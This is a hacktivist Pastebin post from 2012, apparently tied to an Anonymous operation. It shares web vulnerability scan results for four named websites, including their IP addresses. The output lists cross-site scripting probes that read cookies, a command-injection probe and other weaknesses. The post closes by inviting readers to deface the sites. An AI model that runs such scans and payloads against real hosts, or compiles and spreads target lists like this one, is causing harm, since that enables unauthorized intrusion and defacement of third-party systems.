Advertisement
Forever_way

Target Scans -- #OpOutrageBeastiality

Oct 10th, 2012
531
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.68 KB | None | 0 0
  1. Greetings Anonymous,
  2.  
  3. Here's a little update on our targets...
  4.  
  5. 7dog.com --
  6.  
  7.  
  8. ---------------------------------------------------------------------------
  9. + Target IP: 216.17.104.76
  10. + Target Hostname: 7dog.com
  11. + Target Port: 80
  12. + Start Time: 2012-10-06 19:04:13
  13. ---------------------------------------------------------------------------
  14. + Server: Apache
  15. + Retrieved x-powered-by header: PHP/5.2.17
  16. + OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  17. + OSVDB-3931: /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  18. + OSVDB-3931: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  19. + /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  20. + /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  21. + OSVDB-4598: /members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  22. + OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  23. + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  24. + OSVDB-2799: /cgi-bin/dose.pl?daily&somefile.txt&|ls|: DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.
  25. + OSVDB-3093: /squirrelmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
  26. + OSVDB-3233: /icons/README: Apache default file found.
  27. + 6448 items checked: 35 error(s) and 12 item(s) reported on remote host
  28. -------------------------------------------------------------------------------
  29.  
  30. zoo-movs.com --
  31.  
  32. ---------------------------------------------------------------------------
  33. + Target IP: 69.65.42.164
  34. + Target Hostname: ZOO-MOVS.COM
  35. + Target Port: 80
  36. + Start Time: 2012-10-06 18:58:36
  37. ---------------------------------------------------------------------------
  38. + Server: Apache
  39. + Retrieved x-powered-by header: PHP/5.2.17
  40. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
  41. + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  42. + OSVDB-3093: /squirrelmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
  43. + OSVDB-3268: /icons/: Directory indexing found.
  44. + OSVDB-3233: /icons/README: Apache default file found.
  45. + 6448 items checked: 10 error(s) and 6 item(s) reported on remote host
  46. ---------------------------------------------------------------------------
  47.  
  48. animalsexporn.com --
  49.  
  50. ---------------------------------------------------------------------------
  51. + Target IP: 85.17.87.129
  52. + Target Hostname: animalsexporn.net
  53. + Target Port: 80
  54. + Start Time: 2012-10-09 18:01:55
  55. ---------------------------------------------------------------------------
  56. + Server: Apache/2
  57. + Retrieved x-powered-by header: PHP/5.2.17
  58. + No CGI Directories found (use '-C all' to force check all possible dirs)
  59. + Number of sections in the version string differ from those in the database, the server reports: apache/2 while the database has: 2.2.17. This may cause false positives.
  60. + Apache/2 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
  61. + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  62. + OSVDB-3093: /squirrelmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
  63. + OSVDB-3233: /icons/README: Apache default file found.
  64. + 6448 items checked: 9 error(s) and 6 item(s) reported on remote host
  65. ---------------------------------------------------------------------------
  66.  
  67. beastnow.com --
  68.  
  69. ---------------------------------------------------------------------------
  70. + Target IP: 178.237.36.44
  71. + Target Hostname: beastnow.com
  72. + Target Port: 80
  73. + Start Time: 2012-10-09 17:58:23
  74. ---------------------------------------------------------------------------
  75. + Server: Apache/2.2.3 (CentOS)
  76. + Root page / redirects to: http://www.beastnow.com/
  77. + Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
  78. + OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
  79. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
  80. + OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  81. + /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  82. + OSVDB-4598: /members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  83. + OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  84. + OSVDB-3268: /icons/: Directory indexing found.
  85. + OSVDB-3233: /icons/README: Apache default file found.
  86. + 6448 items checked: 1 error(s) and 9 item(s) reported on remote host
  87. ------------------------------------------------------------------------------------
  88.  
  89. More to come soon... Deface if you like.
  90.  
  91. Expect us.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement